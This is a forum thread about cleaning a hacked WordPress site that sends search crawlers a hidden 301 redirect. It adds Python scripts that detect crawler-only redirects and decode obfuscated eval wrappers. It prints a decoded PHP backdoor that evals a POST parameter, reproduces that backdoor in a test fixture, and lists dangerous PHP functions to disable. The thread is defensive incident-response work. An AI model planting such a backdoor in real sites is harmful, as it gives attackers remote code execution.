• User

    301 redirect for spiders but not for users

    Hi everyone,
    a site I look after, vetmobile.it, was hacked a few months ago and since then a problem has arisen that persists to this day and is penalising the site: a 301 redirect was created that only works for spiders; in fact, if you type the URL into the address bar, users see the page correctly.

    First of all I checked Webmaster Tools and found no manual anti-spam action of any kind, so I carried on investigating with the following checks:

    1. I checked that the .htaccess file contained no strange code; here is the file's contents:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    2. I fetched the page as Google sees it (since I can't attach the image, here is a summary):

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 08 Jan 2015 11:25:18 GMT
    Server: Apache/2.4.10 (Unix) mod_fcgid/2.3.9
    X-Powered-By: PHP/5.3.29
    Location: corporatehospitality.it/saccherpas/longchamp/?longchamp=longchamp+pas+cher
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    3. Code of the WordPress template's header.php file:

    <?php
    /**
     * The Header for our theme.
     * Displays all of the <head> section and everything up till <div id="main">
     *
     * @package vantage
     * @since vantage 1.0
     * @license GPL 2.0
     */
    ?><!DOCTYPE html>
    <html <?php language_attributes(); ?>>
    <head>
    <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//google-analytics.com/analytics.js','ga');

    ga('create', 'UA-54302067-28', 'auto');
    ga('send', 'pageview');
    </script>
    <meta name="msvalidate.01" content="03F82B0A68C6B7DF27C3C972D3234F61" />
    <meta charset="<?php bloginfo( 'charset' ); ?>" />
    <meta http-equiv="X-UA-Compatible" content="IE=10" />
    <title><?php wp_title( '|', true, 'right' ); ?></title>
    <link rel="profile" href="gmpg.org/xfn/11" />
    <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
    <?php wp_head(); ?>
    </head>

    <body <?php body_class(); ?>>
    <?php do_action('vantage_before_page_wrapper') ?>
    <div id="page-wrapper">
    <?php do_action( 'vantage_before_masthead' ); ?>
    <?php get_template_part( 'parts/masthead', apply_filters( 'vantage_masthead_type', siteorigin_setting( 'layout_masthead' ) ) ); ?>
    <?php do_action( 'vantage_after_masthead' ); ?>
    <?php vantage_render_slider() ?>
    <?php do_action( 'vantage_before_main_container' ); ?>
    <div id="main" class="site-main">
        <div class="full-container">
            <?php do_action( 'vantage_main_top' ); ?>
    
    4. The contents of the template's index.php file:

    <?php
    /**
     * The main template file.
     *
     * This is the most generic template file in a WordPress theme
     * and one of the two required files for a theme (the other being style.css).
     * It is used to display a page when nothing more specific matches a query.
     * E.g., it puts together the home page when no home.php file exists.
     *
     * @package vantage
     * @since vantage 1.0
     * @license GPL 2.0
     */

    get_header(); ?>

    <div id="primary" class="content-area">
    <div id="content" class="site-content" role="main">
        <?php get_template_part( 'loops/loop', siteorigin_setting('blog_archive_layout') ) ?>
    </div><!-- #content .site-content -->
    </div><!-- #primary .content-area -->

    <?php get_sidebar(); ?>

    <?php get_footer(); ?>

    Any suggestions?
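    The cloaked-301 symptom described in the post above can be verified from the command line without relying on Fetch as Google. The following Python script is an added example, not code from the thread: it requests the same URL once with a browser User-Agent and once with a Googlebot User-Agent, without following redirects, and reports whether the status or Location differ between the two. The local HTTP server inside it is a constructed fixture that reproduces the symptom (301 only for a Googlebot UA) so the check can be exercised offline; its Location value is a placeholder, not the thread's redirect target. To check a real site, call compare_user_agents() with that site's URL instead of the fixture.

```python
"""Detect User-Agent cloaking: does a crawler get a different answer than a browser?
Added example; the local server is a constructed stand-in for the hacked site."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Two identities to compare. Any pair of UAs will do; the crawler one is what matters.
USER_AGENTS = {
    "browser": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/39.0 Safari/537.36",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}


def fetch_head(url, user_agent):
    """Issue one GET without following redirects; return (status, Location header or None)."""
    parts = urlparse(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port, timeout=5)
    conn.request("GET", parts.path or "/", headers={"User-Agent": user_agent})
    resp = conn.getresponse()
    resp.read()  # drain the body so the connection can be closed cleanly
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location


def compare_user_agents(url):
    """Fetch the URL under each UA; cloaking means the (status, Location) pairs differ."""
    responses = {name: fetch_head(url, ua) for name, ua in USER_AGENTS.items()}
    return {"responses": responses, "cloaked": len(set(responses.values())) > 1}


class CloakingFixture(BaseHTTPRequestHandler):
    """Constructed fixture reproducing the symptom in the thread: 301 for crawlers,
    a normal 200 page for everyone else. Only used to exercise the check offline."""

    def do_GET(self):
        if "Googlebot" in self.headers.get("User-Agent", ""):
            self.send_response(301)
            self.send_header("Location", "http://redirect-target.example/")  # placeholder
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            body = b"<html><body>normal page</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def run_check_against_fixture():
    """Start the fixture on a random loopback port, run the comparison, stop it."""
    server = HTTPServer(("127.0.0.1", 0), CloakingFixture)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return compare_user_agents("http://127.0.0.1:%d/" % server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    result = run_check_against_fixture()
    for name, (status, location) in result["responses"].items():
        print("%-10s %s %s" % (name, status, location or ""))
    print("cloaked:", result["cloaked"])
```

    The same comparison with a command-line client is two requests: one plain and one with `-A` set to the Googlebot string above, both without following redirects, then a diff of the status line and Location header.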


  • Admin

    Run a grep over the whole theme and plugins folder looking for "corporatehospitality", or for "eval" or "base64".


  • User

    Hi Juanin,
    thanks for the tip.

    Searching for "eval" I found the file jquery-ui-dialog.php; it's a file whose date differs from all the other js files in the folder, so it's suspect number one.

    Now is it enough to delete it, or is there more to do?

    For the moment I deleted it and immediately ran the Fetch as Google test, but nothing seems to have changed. Do I have to wait?

    Thanks a lot.


  • Admin

    You need to see what's inside it.

    Usually you have to look for a reference similar to the one that appears above. Try various combinations.

    Certainly one of the first things you can do is disable the "dangerous" functions in php.ini.

    Example:

    disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,dl,shell_exec,escapeshellarg,escapeshellcmd,shell_exec,system,passthru,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid


  • User

    Besides the ones you listed, how can I tell whether there are other dangerous functions?

    Here is the code inside the file:

    <?php
    eval(gzinflate(base64_decode('...')));
    ?>


  • Admin

    Yes. Once evaluated, the code it produces is this:

    ?><? @eval($_POST['huanyingbaba']) ?><?

    You have to remove it, because in theory it allows remote execution.

    Once everything is clean, though, you need to work out how they managed to get it in there, otherwise in a few days you'll find it again. They could well have also planted Shellshock with this procedure, so check all the files on your server carefully.
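    Following the grep advice earlier in the thread and the decoded result shown in this reply, here is an added Python example (not code from the thread) that scans a theme/plugin tree for the strings the admin suggested and for the eval/gzinflate/base64_decode wrapper, then peels that wrapper off statically with zlib so the inner PHP can be read without ever executing it. PHP's gzinflate() consumes raw DEFLATE, which zlib reads with wbits=-15. The directory tree and file names are constructed for the demonstration; the inner text planted in the sample file is the one-liner the admin decoded above, reused only so the scanner has something to find and flag.

```python
"""Locate obfuscated eval wrappers in a WordPress tree and read their payload
statically. Added example, not the thread's code; the sample tree is constructed."""
import base64
import os
import re
import tempfile
import zlib

# Strings the admin suggested grepping for, plus the redirect host from the 301 headers.
SUSPICIOUS = re.compile(r"corporatehospitality|\beval\s*\(|base64_decode|gzinflate")
# The exact wrapper shape found in the thread: eval(gzinflate(base64_decode('...')))
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)"
)
# Superglobals that turn an eval into a remotely controllable backdoor.
REMOTE_INPUT = ("$_POST", "$_GET", "$_REQUEST", "$_COOKIE")


def unwrap_payload(source, max_layers=10):
    """Peel eval(gzinflate(base64_decode('...'))) layers without executing anything.
    Stops at the first layer that is not in that shape, or after max_layers."""
    text = source
    for _ in range(max_layers):
        match = WRAPPER.search(text)
        if not match:
            break
        raw = base64.b64decode(match.group(1))
        text = zlib.decompress(raw, -15).decode("utf-8", "replace")  # raw DEFLATE
    return text


def scan_tree(root):
    """Return {relative/path: report} for every .php, .js or .htaccess file that
    contains a suspicious token; the report carries the statically decoded payload."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not (name.endswith((".php", ".js")) or name == ".htaccess"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            tokens = sorted({m.group(0).split("(")[0].strip() for m in SUSPICIOUS.finditer(text)})
            if not tokens:
                continue
            decoded = unwrap_payload(text)
            findings[os.path.relpath(path, root).replace(os.sep, "/")] = {
                "tokens": tokens,
                "wrapped": decoded != text,
                "decoded": decoded,
                "remote_input": any(sg in decoded for sg in REMOTE_INPUT),
            }
    return findings


def make_wrapped_sample(inner_php):
    """Build the wrapper shape seen in the thread around inner_php, for the fixture only
    (compressobj with wbits=-15 emits the raw DEFLATE that gzinflate expects)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = comp.compress(inner_php.encode()) + comp.flush()
    return "<?php\neval(gzinflate(base64_decode('%s')));\n?>\n" % base64.b64encode(data).decode()


def demo():
    """Constructed mini site: one clean theme file and one planted jquery-ui-dialog.php."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme = os.path.join(root, "wp-content", "themes", "vantage")
    plugin = os.path.join(root, "wp-content", "plugins", "some-plugin", "js")
    os.makedirs(theme)
    os.makedirs(plugin)
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write("<?php wp_head(); ?>\n<title><?php wp_title('|', true, 'right'); ?></title>\n")
    with open(os.path.join(plugin, "jquery-ui-dialog.php"), "w") as fh:
        # Inner text is the one-liner the admin decoded in the thread.
        fh.write(make_wrapped_sample("?><? @eval($_POST['huanyingbaba']) ?><?"))
    return scan_tree(root)


if __name__ == "__main__":
    for path, report in demo().items():
        print(path, report["tokens"], "remote_input=%s" % report["remote_input"])
        print("  decoded:", report["decoded"].strip())
```

    On a real install, call scan_tree() on the document root. A file flagged with wrapped=True and remote_input=True is the kind of backdoor the thread found; the decoded text also gives the POST variable name the admin says to grep for, so the same string can be searched across the rest of the tree and in the access logs.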


  • User

    To recap:

    1. I remove the jquery-ui-dialog.php file
    2. I check the whole content of the server to work out how they managed to insert it. For this operation there is a plugin, Shellshock Check. Have you already used it? Would you recommend a manual search anyway?

    Thanks again.

  • Admin

    You don't need to remove the file, only the malicious portion of code.

    Also check whether there are others, and also search for the name of the variable in the POST. Apart from that, I work directly from the shell, so I can't recommend any tools.